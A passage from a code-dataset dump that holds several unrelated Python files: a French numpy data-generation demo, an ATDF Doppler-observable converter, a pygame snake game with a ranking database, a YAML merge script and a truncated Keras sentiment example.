originales. Par exemple, les longueurs mesurees en metres (m) ont une variance mesuree en metres carres (m2).\n# La racine carree de la variance nous donne les unites utilisees dans l echelle originale.\n\n# ecart-type (S) = Racine carree de la variance\n# L ecart-type est la mesure de dispersion la plus couramment utilisee en statistique lorsqu on emploie la moyenne pour calculer une tendance centrale. Il mesure donc la dispersion autour de la moyenne. En raison de ses liens etroits avec la moyenne, l ecart-type peut etre grandement influence si cette derniere donne une mauvaise mesure de tendance centrale.\n\n\n# ecart type: \n\n# numpy.random.randn(nombre_de_rows, nombre_de_dimension) \n\naa = np.random.randn(10, 10)\n# print(\"aa :\", aa)\n\nab = np.random.randn(10, 2)\n# print(\"ab :\", ab)\n\n\n\n# extrait\nrow_per_class = 2\n\nc = np.random.randn(row_per_class, 2)\n# print(\"c :\", c)\n\nd = np.random.randn(row_per_class, 2)\n# print(\"d :\", d)\n\ne = c + np.array([-2, -2])\n# print(\"e :\", e)\n\nf = d + np.array([2, 2])\n# print(\"f :\", f)\n\n\n\n\n# Generate rows\nsick = np.random.randn(row_per_class, 2) + np.array([-2, -2])\nsick_2 = np.random.randn(row_per_class, 2) + np.array([2, 2])\n\nhealthy = np.random.randn(row_per_class, 2) + np.array([-2, 2])\nhealthy_2 = np.random.randn(row_per_class, 2) + np.array([2, -2])\n# print(\"sick: \", sick)\n# print(\"sick_2: \", sick_2)\n# print(\"healthy: \", healthy)\n# print(\"healthy_2: \", healthy_2)\n\nfeatures = np.vstack([sick, sick_2, healthy, healthy_2])\n# print(\"features: \", features)\n\nfeatures2 = np.concatenate([sick, sick_2, healthy, healthy_2])\n# print(\"features2: \", features2)\n\ng = np.array([[1,2,3],[4,5,6]])\nh = np.array([[11,12,13],[14,15,16]])\ni = np.vstack([g,h]) # \nj = np.concatenate((g,h),axis=0)\n# print(\"g :\", g)\n# print(\"h :\", h)\n# print(\"i :\", i)\n# print(\"j :\", j)\n\n\n\n\n\ndef get_dataset():\n \"\"\"\n Method used to generate the dataset\n \"\"\"\n # Numbers of row per class\n row_per_class = 10\n # Generate rows\n # np.random.randn(row_per_class, 2) = genere des points proches de 0, et l'addition de l'array place dans le bon cadran\n sick = np.random.randn(row_per_class, 2) + np.array([-2, -2])\n sick_2 = np.random.randn(row_per_class, 2) + np.array([2, 2])\n\n healthy = np.random.randn(row_per_class, 2) + np.array([-2, 2])\n healthy_2 = np.random.randn(row_per_class, 2) + np.array([2, -2])\n\n features = np.vstack([sick, sick_2, healthy, healthy_2])\n targets = np.concatenate((np.zeros(row_per_class * 2), np.zeros(row_per_class * 2) + 1))\n targets2 = np.arange(40)\n print(\"features:\", features)\n print(\"targets:\", targets)\n\n\n targets = targets.reshape(40,)\n\n return features, targets\n\nif __name__ == '__main__':\n features, targets = get_dataset()\n # Plot points\n# plt.scatter(features[:, 0], features[:, 1], s=40, c=targets, cmap=plt.cm.Spectral)\n plt.scatter(features[:, 0], features[:, 1], c=targets, cmap=plt.cm.Spectral)\n\nplt.show()\n\n\n\n\n# import numpy as np\n\n\n\n\n\n\n\n\n### CODE ###\n\n# import matplotlib.pyplot as plt\n# import tensorflow as tf\n# import numpy as np\n\n# def get_dataset():\n# \"\"\"\n# Method used to generate the dataset\n# \"\"\"\n# # Numbers of row per class\n# row_per_class = 100\n# # Generate rows\n# np.random.randn(row_per_class, 2) = genere des points proches de 0, et l'addition de l'array place dans le bon cadran\n# sick = np.random.randn(row_per_class, 2) + np.array([-2, -2])\n# sick_2 = np.random.randn(row_per_class, 2) + np.array([2, 2])\n\n# healthy = np.random.randn(row_per_class, 2) + np.array([-2, 2])\n# healthy_2 = np.random.randn(row_per_class, 2) + np.array([2, -2])\n\n# features = np.vstack([sick, sick_2, healthy, healthy_2])\n# targets = np.concatenate((np.zeros(row_per_class * 2), np.zeros(row_per_class * 2) + 1))\n\n# targets = targets.reshape(400,) # nombre de coordonnée généré avant, reshape modifie la dimension, cela va créer un tableau de 40 éléments dont les 20 premiers sont 0 et les autres 1, les datas étant \n# classés par ordre (malade puis safe), les malades seront en bleu et les autres en rouge (selon la cmap)\n\n# return features, targets\n\n# if __name__ == '__main__':\n# features, targets = get_dataset()\n# # Plot points\n# plt.scatter(features[:, 0], features[:, 1], s=40, c=targets, cmap=plt.cm.Spectral) # scatter : nuage de pointe, [:, 0] = colomne 0 de feature, colomone 1 de feature\n# plt.show()\n\n####","repo_name":"vaboston/numpy-1st","sub_path":"createExempleData.py","file_name":"createExempleData.py","file_ext":"py","file_size_in_byte":5444,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72822202552","text":"\"\"\" \n\nDoppler class\n\nUsing phase count information from the ATDF file, this class builds and outputs One-Way-Doppler,\nTwo-Way-Doppler, and Three-Way-Doppler observables in Ascii format.\n\nAUTHOR:\n\n Dr. Ashok Kumar Verma (1,2)\n 1. Department of Earth, Planetary, and Space Sciences\n University of California, Los Angeles, 90095, CA, USA.\n 2. NASA Goddard Space Flight Center, Greenbelt, 20771, MD, USA.\n \n Contact: ashokkumar.verma@nasa.gov\n\n\"\"\"\n\nimport functions as fn\nimport numpy as np\n\n# ===========================================================================\nfrom functions import dic_attrs\n\n\ndef store_record(rec: dict,\n next_rec_at: str,\n count_time: float) -> dic_attrs:\n \"\"\"\n Save current record in the dictionary.\n \n Args:\n rec: The record to save.\n next_rec_at: The expected time of the next record.\n count_time: The count time.\n\n Returns: Data dictionary.\n\n \"\"\"\n data = fn.dic_attrs(rec=None, next_rec_at=None, count_time=None)\n data.rec = rec\n data.next_rec_at = next_rec_at\n data.count_time = count_time\n \n return data\n\n\n# ===========================================================================\nclass Doppler:\n \"\"\"\n Using phase count information from the ATDF file, this class builds and outputs One-Way-Doppler\n and Two-Way-Doppler observables in Ascii format.\n \n \"\"\"\n \n # -----------------------------------------------------------------------\n def __init__(self, doppler_recs: list,\n transponder_freq: float,\n dtype: int,\n count_time: float,\n out_file: object,\n ramp_data: list):\n \"\"\"\n \n Args:\n doppler_recs: List of Doppler records.\n transponder_freq: Transponder frequency.\n dtype: Data type.\n count_time: The count time.\n out_file: Path to the output file.\n \"\"\"\n self.recs = doppler_recs\n self.data_type = dtype\n self.count_time = count_time\n self.transponder_freq = transponder_freq\n self.out_file = out_file\n self.ramp_band = None\n self.ramp_xmtr = None\n self.ramp_end = None\n self.ramp_start = None\n self.read_ramp(ramp_data)\n \n # -----------------------------------------------------------------------\n def read_ramp(self, ramp_data: str):\n \"\"\"\n Read ramp data to get transmitter for 3-Way Doppler.\n\n Args:\n out_file: Path to the output file.\n\n \"\"\"\n\n if not len(ramp_data): return \n try:\n data = np.loadtxt(ramp_data, dtype=str, delimiter=',', ndmin=2)\n self.ramp_start = np.array([fn.str2datetime(d.strip()) for d in data[:, 0]])\n self.ramp_end = np.array([fn.str2datetime(d.strip()) for d in data[:, 1]])\n self.ramp_xmtr = np.array([d.strip() for d in data[:, 2]])\n self.ramp_band = np.array([d.strip() for d in data[:, 3]])\n except Exception as e: \n msg = 'Unable to read data from ramp file:\\nRamp file : %s\\n' % ramp_file\n fn.raise_warning(msg)\n \n # -----------------------------------------------------------------------\n def get_xmtr(self, time_tag: str,\n band: str,\n stn: str):\n \n stn = 'DSS %s' % stn\n \n # for 1-Way\n if self.data_type == 1: return \"S/C\"\n \n # for 2-Way\n if self.data_type == 2: return stn\n \n # for 3-Way\n # get transmitter station, if time tag falls between start and end time,\n # and uplink band equals to the ramp band, and rcvr not equal to xmtr.\n if self.ramp_start is None or self.ramp_end is None or \\\n self.ramp_band is None or self.ramp_xmtr is None: return None\n map = (time_tag >= self.ramp_start) & (time_tag < self.ramp_end) & \\\n (self.ramp_band == band) & (self.ramp_xmtr != stn)\n xmtr = self.ramp_xmtr[map]\n \n if xmtr.size: return xmtr[0]\n return None\n \n # -----------------------------------------------------------------------\n def convert(self, rec: dict,\n start_doppler: dict,\n count_time: float) -> dict:\n \"\"\"\n This function checks and stores new start record for each station according to\n uplink and downlink bands. If start record already exists, then it converts records\n to the observables and replace start record with the current record.\n \n Args:\n rec: The ith Doppler record.\n start_doppler: The start record of the Doppler.\n count_time: The count time.\n\n Returns: Updated record of Doppler\n\n \"\"\"\n \n # getting time tag, station and band records.\n time_tag = fn.str2datetime(rec['time_tag'])\n station = fn.is_dsn_valid(rec, data_type=self.data_type_name())\n ul = rec['uplink_band']\n dl = rec['dnlink_band']\n \n # return if invalid DSN station encounters\n if station is None: return start_doppler\n \n # get transmitter\n xmtr = self.get_xmtr(time_tag, ul, station)\n if xmtr is None: return start_doppler\n \n # creating record key according to the DSN station\n # unlink- and downlink-band.\n rec_key = station + ul + dl\n \n # store start record as the former record\n former_rec = start_doppler[rec_key]\n \n # check count time units\n if count_time >= 1.0 and former_rec.rec is None:\n ms = time_tag.microsecond\n sec = time_tag.second\n \n # store record if no previous record found for the record key\n if former_rec.rec is None:\n next_rec_at = fn.add_time(time_tag, sec=count_time, dtType=True)\n former_rec = store_record(rec, next_rec_at, count_time)\n start_doppler.update({rec_key: former_rec})\n return start_doppler\n \n # convert records to observables if former record is not None\n # and all other conditions are also met.\n if time_tag == former_rec.next_rec_at and \\\n station == former_rec.rec['station'] and \\\n ul == former_rec.rec['uplink_band'] and \\\n dl == former_rec.rec['dnlink_band'] and \\\n rec['channel_number'] == former_rec.rec['channel_number']:\n self.write_msr(former_rec, rec, station, xmtr, count_time)\n next_rec_at = fn.add_time(time_tag, sec=count_time, dtType=True)\n former_rec = store_record(rec, next_rec_at, count_time)\n start_doppler.update({rec_key: former_rec})\n return start_doppler\n \n # if time tag is not as expected then reset the former records.\n if time_tag > former_rec.next_rec_at:\n former_rec = store_record(None, None, None)\n start_doppler.update({rec_key: former_rec})\n return start_doppler\n \n return start_doppler\n \n # -----------------------------------------------------------------------\n def get_ref_freq(self, rec: dict):\n \"\"\"\n\n Args:\n rec: The Doppler record.\n\n Returns: Reference frequency\n\n \"\"\"\n freq = rec['doppler_ref_freq']\n ul = rec['uplink_band']\n dl = rec['dnlink_band']\n stn = rec['station']\n rcvr_type = rec['doppler_rcvr_type']\n \n # get frequency multiplier\n fac = fn.get_mul_fac(freq)\n if fac == 0:\n msg = \"\\nInvalid reference frequency, %s MHz, at time %s.\\n Expected around 22MHz.\\n\" \\\n + \"Skipping this record.\\n\"\n fn.raise_warning(msg % (freq / fn.MHz, rec['time_tag']))\n return False\n \n freq = freq / fac\n \n # for 1-way Doppler\n if self.data_type == 1:\n \n if freq > 22e6:\n ul = 'S'\n else:\n ul = dl\n \n # S-band uplink frequency\n # Moyer, Equation 13-1, section 13.2.1)\n if ul == \"S\":\n ref_freq = 96.0 * freq\n \n # X-band frequency\n # Moyer, Equation 13-2/4, section 13.2.1)\n elif ul == \"X\":\n if stn in ['15', '45', '65'] and rcvr_type != 5:\n freq = 4.68125 * freq - 81.4125e6\n ref_freq = 32.0 * freq + 6.5e9\n \n # for Ka band\n elif ul == \"Ka\":\n ref_freq = 1000.0 * freq + 1e10\n \n # for all others band\n else:\n msg = '=' * 80 + \\\n '\\n~*~*~ The given reference frequency is not at the sky level ~*~*~' \\\n '\\nAt the moment, program is unable to compute the sky frequency at:' \\\n '\\nTime Tag: %s UTC' \\\n '\\nStation: DSS %s' \\\n '\\nUplink Band: %s' \\\n '\\nReference Freq: %s Hz\\n' + '=' * 80\n fn.raise_warning(msg % (rec['time_tag'], rec['station'], ul, rec['doppler_ref_freq']))\n return False\n \n return ref_freq\n \n # -----------------------------------------------------------------------\n def data_type_name(self):\n \"\"\"\n Convert int data type to string.\n Returns: String value of the data type.\n\n \"\"\"\n if self.data_type == 1: return '1-Way-Doppler'\n if self.data_type == 2: return '2-Way-Doppler'\n if self.data_type == 3: return '3-Way-Doppler'\n \n # -----------------------------------------------------------------------\n def write_msr(self,\n former_rec: dict,\n rec: dict,\n rcvr: str,\n xmtr: str,\n count_time: float):\n \"\"\"\n Write observables into ascii table.\n Args:\n former_rec: The Doppler record.\n rec: The current Doppler record.\n rcvr: The name of the receiver.\n xmtr: The name of the transmitter.\n count_time: The count time.\n\n \"\"\"\n # get uplink and downlink bands\n uplink_band = rec['uplink_band']\n dnlink_band = rec['dnlink_band']\n \n # get average delays\n sc_delay = 0.5 * (rec['sc_delay'] + former_rec.rec['sc_delay'])\n xmtr_delay = rec['exciter_stn_delay']\n rcvr_delay = rec['rcvr_stn_delay']\n \n # get average doppler bias (Moyer, Equation 13-22, section 13.3.1)\n C4 = rec['doppler_bias']\n \n # get doppler shift\n doppler_count_t2 = rec['doppler_count']\n doppler_count_t1 = former_rec.rec['doppler_count']\n \n # get change in the doppler cycles which accumulates during the count interval\n # (Moyer, first part of the right-hand Equation 13-26, DeltaN/Tc)\n delta_n_tc = (doppler_count_t2 - doppler_count_t1) / count_time\n \n # get middle time of two doppler counts \n time_tag = fn.add_time(fn.str2datetime(former_rec.rec['time_tag']), sec=count_time * 0.5)\n \n # get reference frequency\n # -- get exciter band if reference freq. is given at the sky level\n rcvr_exciter_band = fn.msr_band(rec['doppler_ref_freq'])\n \n if rcvr_exciter_band is not None:\n # -- get reference freq. if given at the sky level.\n ref_freq = rec['doppler_ref_freq']\n # -- get exciter band if reference freq. is not given at the sky level.\n else:\n # -- get exciter band if turnaround ratio is given\n if rec[\"turnaround_ratio_num\"] != 0 and rec[\"turnaround_ratio_den\"] != 0:\n rcvr_exciter_band = fn.find_exciter_band(rec[\"turnaround_ratio_num\"] / rec[\"turnaround_ratio_den\"])\n \n # -- if turnaround ratio is not given, set exciter band to uplink band.\n else:\n rcvr_exciter_band = uplink_band\n \n # -- compute reference freq. if not given at the sky level.\n ref_freq = self.get_ref_freq(rec)\n \n f_bias = 0\n if ref_freq:\n # get frequency bias (Moyer, Equation 13-28, section 13.3.1)\n if self.data_type == 1:\n f_bias = 0\n C2 = fn.c_2(dnlink_band)\n M2 = fn.m_2(fn.msr_band(ref_freq), dnlink_band)\n f_bias = M2 * ref_freq - C2 * self.transponder_freq + C4\n ref_freq = self.transponder_freq\n else:\n f_bias = C4\n \n if not abs(delta_n_tc): return\n \n # get doppler observables (Moyer, Equation 13-26)\n observed = delta_n_tc - abs(f_bias)\n if C4 != 0.0: observed = C4 / abs(C4) * observed\n \n # corrections, in the case of a modulo reset\n reset = round(observed * count_time / 2 ** 32)\n if reset:\n if observed > 0:\n observed = observed - 2 ** 32 / count_time\n else:\n observed = observed + 2 ** 32 / count_time\n \n # write output\n rcvr = 'DSS %s' % rcvr\n if count_time == former_rec.count_time:\n self.out_file.write(\n \"%27s, %15s, %5s, %10s, %10s, %5s, %5s, %5s, %5s, %10s, %10s, %25.10f, %25.10f, %15.6f, %15.6f, \"\n \"%15.6f\\n\" \\\n % (time_tag,\n self.data_type_name(),\n rec['sc_id'],\n xmtr,\n rcvr,\n rec['channel_number'],\n uplink_band,\n dnlink_band,\n rcvr_exciter_band,\n count_time,\n rec['lwt_rng_component'],\n observed,\n ref_freq,\n xmtr_delay * fn.sec2nanosec,\n rcvr_delay * fn.sec2nanosec,\n sc_delay * fn.sec2nanosec,\n )\n )\n \n # -----------------------------------------------------------------------\n def doppler_table(self):\n \"\"\"\n \n Converts binary Doppler records into ascii table.\n \n \"\"\"\n \n # set empty start record\n start_doppler = fn.rec_dict(\n fn.dic_attrs(rec=None,\n next_rec_at=None,\n count_time=None,))\n \n # get all doppler records\n size = len(self.recs)\n if size > 0:\n \n # set update progress\n umsg = \"Extracting %s\" % (self.data_type_name())\n prog = fn.progressBar()\n prog.start(1, umsg)\n \n # write a header of the output file.\n self.out_file.write(\n \"%s %25s, %15s, %5s, %10s, %10s, %5s, %5s, %5s, %5s, %10s, %10s, %25s, %25s, %15s, %15s, %15s\\n\" \\\n % (\"#\", \"time_tag (UTC)\", \"Data Type\", \"scID\", \"Xmtr\", \"Rcvr\", \"Chnl\", \"UL\", \"DL\", \"Ex\", \"CT (sec)\",\n \"Rng-LC\", \"Observed (Hz)\", \"Ref-Freq (Hz)\", \"XmtrDly (nsec)\", \"RcvrDly (nsec)\", \"ScDly (nsec)\"))\n \n # loop through every record.\n i = 0\n for rec in self.recs:\n \n # set count time.\n if self.count_time is None:\n count_time = rec['count_time']\n else:\n if rec['count_time'] in self.count_time:\n count_time = rec['count_time']\n else:\n count_time = self.count_time[-1]\n \n start_doppler = self.convert(rec, start_doppler, count_time)\n prog.setStep(i / size)\n prog.stop()\n \n # ===========================================================================\n","repo_name":"ashokverma24/atdf2ascii","sub_path":"src/Doppler.py","file_name":"Doppler.py","file_ext":"py","file_size_in_byte":15971,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"95"} +{"seq_id":"12521573202","text":"\ndef my_func(x,y,z=20):\n return x + y + z\n\nlist1 = ['first ', 'second ', 'third ']\n\nprint(my_func(*list1))\n\nmy_dict = {\n 'x': 'value1',\n 'y': 'value2',\n 'z': 'value3',\n}\n\nprint(my_func(**my_dict))\n\n","repo_name":"grenn72/pynet-ons-feb19","sub_path":"day1/my_func_ex2.py","file_name":"my_func_ex2.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"95"} +{"seq_id":"34663926223","text":"import pygame\nfrom pygame.locals import *\nimport time\nimport random\n\n# objects y snake con 40px\nfrom connection import *\n\nSIZE = 40\n\n\n# pygame.init()\n\n\nclass Object:\n def __init__(self, parent_screen, imagen, imagen2, bad):\n self.parent_screen = parent_screen\n self.image1 = pygame.image.load(f\"images/{imagen}\").convert_alpha()\n self.image2 = pygame.image.load(f\"images/{imagen2}\").convert_alpha()\n self.bad = pygame.image.load(f\"images/{bad}\").convert_alpha()\n\n # posicion de inicio del objeto 1\n self.x = SIZE * 4\n self.y = SIZE * 4\n\n # posicion de inicio del objeto 2\n self.x2 = SIZE * 14\n self.y2 = SIZE * 14\n\n # posicion de malo\n self.x3 = SIZE * 16\n self.y3 = SIZE * 16\n\n def draw(self):\n # pinto los objects en sus posiciones\n self.parent_screen.blit(self.image1, (self.x, self.y))\n self.parent_screen.blit(self.image2, (self.x2, self.y2))\n self.parent_screen.blit(self.bad, (self.x3, self.y3))\n pygame.display.flip() # updating the screen\n\n def moveObject1(self):\n # ubicaciones donde queremos que se ubiquen los objects en aleatorio\n self.x = random.randint(1, 24) * SIZE\n self.y = random.randint(1, 19) * SIZE\n\n self.x3 = random.randint(1, 24) * SIZE\n self.y3 = random.randint(1, 19) * SIZE\n\n def moveObject2(self):\n self.x2 = random.randint(1, 24) * SIZE\n self.y2 = random.randint(1, 19) * SIZE\n\n self.x3 = random.randint(1, 24) * SIZE\n self.y3 = random.randint(1, 19) * SIZE\n\n def moveObject3(self):\n self.x3 = random.randint(1, 24) * SIZE\n self.y3 = random.randint(1, 19) * SIZE\n\n\nclass Snake:\n\n def __init__(self, parent_screen, length, fondo, face):\n self.length = length\n self.parent_screen = parent_screen\n '''self.color1 = color1\n self.color2 = color2\n self.color3 = color3'''\n self.face = face\n\n self.fondo1 = pygame.image.load(f\"images/{fondo}\").convert()\n\n # imagenes de la serpiente, cuerpo y cola.\n self.block = pygame.image.load(\"images/snake40.jpg\").convert()\n self.face1 = pygame.image.load(f\"images/{face}\").convert()\n # self.blockeyes = pygame.image.load(\"images/snakeojos.jpg\").convert()\n # self.blockmask = pygame.image.load(\"images/snakeojosmask.jpg\").convert()\n self.blockcola = pygame.image.load(\"images/cola5.jpg\").convert()\n self.x = [SIZE] * length\n self.y = [SIZE] * length\n\n self.direction = 'down'\n\n def increase_length(self):\n self.length += 1\n self.x.append(-1)\n self.y.append(-1)\n\n def move_left(self):\n if self.direction != \"right\":\n self.direction = 'left'\n\n def move_right(self):\n if self.direction != \"left\":\n self.direction = 'right'\n\n def move_up(self):\n if self.direction != \"down\":\n self.direction = 'up'\n\n def move_down(self):\n if self.direction != \"up\":\n self.direction = 'down'\n\n def draw(self):\n self.parent_screen.blit(self.fondo1, (0, 0))\n self.parent_screen.blit(self.face1, (self.x[0], self.y[0]))\n # pintamos la sepriente\n for i in range(1, self.length - 1):\n self.parent_screen.blit(self.block, (self.x[i], self.y[i]))\n # pintamos la cola.\n self.parent_screen.blit(self.blockcola, (self.x[-1], self.y[-1]))\n pygame.display.flip() # updating the screen\n\n def walk(self):\n for i in range(self.length - 1, 0, -1):\n self.x[i] = self.x[i - 1]\n self.y[i] = self.y[i - 1]\n\n # coordenadas de pared, si llega se choca y gameover\n if self.direction == 'left':\n self.x[0] -= SIZE\n if self.x[0] < 0:\n Game.show_game_over()\n\n if self.direction == 'right':\n self.x[0] += SIZE\n if self.x[0] > 1000:\n Game.show_game_over()\n\n if self.direction == 'up':\n self.y[0] -= SIZE\n if self.y[0] < 0:\n Game.show_game_over()\n\n if self.direction == 'down':\n self.y[0] += SIZE\n if self.y[0] > 800:\n Game.show_game_over()\n\n self.draw()\n\n\nclass Game:\n def __init__(self, user_text, fondo1, imagen, imagen2, bad, face1):\n # print(n1)\n '''self.n1 = n1\n self.n2 = n2\n self.n3 = n3'''\n self.user_text = user_text\n self.fondo1 = fondo1\n self.imagen = imagen\n self.imagen2 = imagen2\n self.bad = bad\n self.face1 = face1\n self.contador = 5\n self.cursor = db.cursor()\n\n # pygame.init()\n # tamaño de la apntalla\n self.surface = pygame.display.set_mode((1000, 800))\n self.surface.blit(pygame.image.load(f\"images/{fondo1}\").convert(), [0, 0])\n\n # musica fondo\n pygame.mixer.init()\n # self.play_background_music()\n #print(\"game : \", self.user_text)\n pygame.display.set_caption(\"SERPIENCOVID GAME\")\n # self.surface.fill((n1, n2, n3))\n self.snake = Snake(self.surface, 2, fondo1, face1)\n self.snake.draw()\n self.object = Object(self.surface, imagen, imagen2, bad)\n self.object.draw()\n\n @staticmethod\n # colisiones\n def is_collision(x1, y1, x2, y2):\n if x2 <= x1 < x2 + SIZE:\n if y2 <= y1 < y2 + SIZE:\n return True\n return False\n\n '''def play_background_music(self):\n pygame.mixer.music.load(\"sounds/bg_music_1.mp3\")\n pygame.mixer.music.play()'''\n\n def play_sound(self, sound):\n sound = pygame.mixer.Sound(f\"{sound}.mp3\")\n pygame.mixer.Sound.play(sound)\n\n def play(self):\n\n self.snake.walk()\n self.object.draw()\n self.display_score()\n pygame.display.flip()\n\n # snake collision wiht the object1\n if self.is_collision(self.snake.x[0], self.snake.y[0], self.object.x, self.object.y):\n self.play_sound(\"sounds/ding\")\n # print(\"Colission\")\n self.snake.increase_length()\n self.object.moveObject1()\n\n # snake collision wiht the object2\n if self.is_collision(self.snake.x[0], self.snake.y[0], self.object.x2, self.object.y2):\n self.play_sound(\"sounds/ding\")\n # print(\"Colission\")\n self.snake.increase_length()\n self.object.moveObject2()\n\n if self.is_collision(self.snake.x[0], self.snake.y[0], self.object.x3, self.object.y3):\n self.play_sound(\"sounds/crash\")\n self.contador = self.contador - 1\n # print(self.contador)\n # self.snake.reduce_length()\n self.object.moveObject3()\n\n # snake colLiding with itself\n for i in range(3, self.snake.length):\n if self.is_collision(self.snake.x[0], self.snake.y[0], self.snake.x[i], self.snake.y[i]):\n self.play_sound(\"sounds/crash\")\n raise Exception(\"Collision occured\")\n\n def show_game_over(self):\n # fondo de pantalla para cuando gameover\n self.surface.fill((216, 115, 112))\n base_font100 = pygame.font.Font(\"SF Hollywood Hills.ttf\", 100)\n base_font50 = pygame.font.Font(\"SF Hollywood Hills Italic.ttf\", 50)\n line1 = base_font100.render(f\"Game is over!\", True, (255, 255, 255))\n line2 = base_font50.render(f\"Your score is {self.snake.length}\", True, (255, 255, 255))\n len0 = base_font50.render(\"OUCH! You can do it better!\", True, (255, 255, 255))\n len10 = base_font50.render(\"Ohh!! Good game!!\", True, (255, 255, 255))\n len15 = base_font50.render(\"WOWW! How long have you been practicing? You are a crack!!\", True, (255, 255, 255))\n if self.snake.length < 7:\n self.surface.blit(len0, (225, 300))\n elif self.snake.length < 15:\n self.surface.blit(len10, (225, 300))\n else:\n self.surface.blit(len15, (225, 300))\n\n self.surface.blit(line1, (225, 155))\n self.surface.blit(line2, (225, 400))\n line3 = base_font50.render(\"To play again press Enter.\", True, (255, 255, 255))\n line4= base_font50.render(\"To exit press Escape!\", True, (255, 255, 255))\n self.surface.blit(line3, (225, 500))\n self.surface.blit(line4, (225, 550))\n\n updatePoints = \"\"\"UPDATE ranking SET points = points + %s WHERE nameUser = %s\"\"\"\n val2 = (self.snake.length, self.user_text)\n self.cursor.execute(updatePoints, val2)\n db.commit()\n pygame.display.flip()\n pygame.mixer.music.pause()\n\n def reset(self):\n # reset de los objects y de la sepriente para que empiece de 0\n self.snake = Snake(self.surface, 2, self.fondo1, self.face1)\n self.object = Object(self.surface, self.imagen, self.imagen2, self.bad)\n\n def display_score(self):\n # puntos por partida, insertar bbdd\n base_font40 = pygame.font.Font(\"SF Hollywood Hills Italic.ttf\", 40)\n score = base_font40.render(f\"Score: {self.snake.length - 2}\", True, (255, 255, 255))\n self.surface.blit(score, (830, 10))\n\n lives = base_font40.render(f\"Lives: {self.contador}\", True, (255, 255, 255))\n self.surface.blit(lives, (20, 10))\n\n if self.contador == 0:\n raise Exception(\"Collision occured\")\n\n def run(self, tiempo):\n running = True\n pause = False\n\n while running:\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n running = False\n if event.key == K_RETURN:\n pygame.mixer.music.unpause()\n pause = False\n\n if not pause:\n if event.key == K_UP:\n self.snake.move_up()\n\n if event.key == K_DOWN:\n self.snake.move_down()\n\n if event.key == K_LEFT:\n self.snake.move_left()\n\n if event.key == K_RIGHT:\n self.snake.move_right()\n\n elif event.type == QUIT:\n running = False\n try:\n if not pause:\n self.play()\n except Exception as e:\n self.show_game_over()\n pause = True\n self.reset()\n time.sleep(tiempo)\n","repo_name":"iaparicioz/final1","sub_path":"juego.py","file_name":"juego.py","file_ext":"py","file_size_in_byte":10558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"8850799202","text":"#!/usr/bin/env python\nimport sys\nimport yaml\n\n\ndef main():\n fin, fadd, fout = sys.argv[1:4]\n with open(fin, 'r') as f:\n config = yaml.load(f.read(), yaml.SafeLoader)\n with open(fadd, 'r') as f:\n config.update(yaml.load(f.read(), yaml.SafeLoader))\n with open(fout, 'w') as f:\n yaml.dump(config, f)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"covidvis/covid19-vis","sub_path":"scripts/transform-config.py","file_name":"transform-config.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"95"} +{"seq_id":"72541936313","text":"from tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Embedding, LSTM\nimport numpy as np\n\ndocs = ['너무 재밌어요', '참 최고에요', '참 잘 만든 영화에요', '추천하고 싶은 영화입니다.', \n '한 번 더 보고 싶네요', '글쎄요', '별로에요', '생각보다 지루해요', '연기가 어색해요', \n '재미없어요', '너무 재미없다', '참 재밌네요', '청순이가 잘 생기긴 했어요']\n\n# positive token: 1 / negative token: 0\nlabels = np.array([1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1])\n\ntokenizer = Tokenizer()\ntokenizer.fit_on_texts(docs)\n# {'참': 1, '너무': 2, '잘': 3, '재밌어요': 4, '최고에요': 5, '만든': 6, '영화에요': 7, \n# '추천하고': 8, '싶은': 9, '영화입니다': 10, '한': 11, '번': 12, '더': 13, '보고': 14, \n# '싶네요': 15, '글쎄요': 16, '별로에요': 17, '생각보다': 18, '지루해요': 19, '연기가': 20, \n# '어색해요': 21, '재미없어요': 22, '재미없다': 23, '재밌네요': 24, '청순이가': 25, \n# '생기긴': 26, '했어요': 27}\n\nx = tokenizer.texts_to_sequences(docs)\n# [[2, 4], [1, 5], [1, 3, 6, 7], [8, 9, 10], [11, 12, 13, 14, 15], \n# [16], [17], [18, 19], [20, 21], [22], [2, 23], [1, 24], [25, 3, 26, 27]]\n# pad_x = pad_sequences(x, maxlen=max(map(lambda x: len(x), x)), padding='pre')\npad_x = pad_sequences(x, maxlen=5, padding='post')\n# [[ 0 0 0 2 4]\n# [ 0 0 0 1 5]\n# [ 0 1 3 6 7]\n# [ 0 0 8 9 10]\n# [11 12 13 14 15]\n# [ 0 0 0 0 16]\n# [ 0 0 0 0 17]\n# [ 0 0 0 18 19]\n# [ 0 0 0 20 21]\n# [ 0 0 0 0 22]\n# [ 0 0 0 2 23]\n# [ 0 0 0 1 24]\n# [ 0 25 3 26 27]]\n\nimport tensorflow as tf\nstrategy = tf.distribute.MirroredStrategy(devices=['/gpu:0'])\nwith strategy.scope():\n model = Sequential()\n model.add(Embedding(input_dim=28, output_dim=11, input_length=5))\n # Embedding: encodes words to one-hot vector then map the vectors to 2D coordinate system.\n # input_dim: word_index+1 - 단어의 종류\n # input_length: 문장의 단어 개수\n # output_dim: arbitrary\n # if given as positional, input_dim, output_dim, input_length\n model.add(LSTM(32))\n model.add(Dense(1, activation='sigmoid'))\n # 1: positive, 0: negative\n\n\n# Model: \"sequential\"\n# _________________________________________________________________\n# Layer (type) Output Shape Param #\n# =================================================================\n# embedding (Embedding) (None, 5, 11) 308\n# _________________________________________________________________\n# lstm (LSTM) (None, 32) 5632\n# _________________________________________________________________\n# dense (Dense) (None, 1) 33\n# =================================================================\n# the number of parameters for Embedding layer:\n# > input_dim(the number of words)*output_dim(the number of nodes)\n# > Embedding layers output when args are given as (input_dim, output_dim), positional\n# > Output Shape: (None=batch_size, None=the number of sentence, output_dim=nodes)\n model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['acc'])\n model.fit(pad_x, labels, epochs=120, 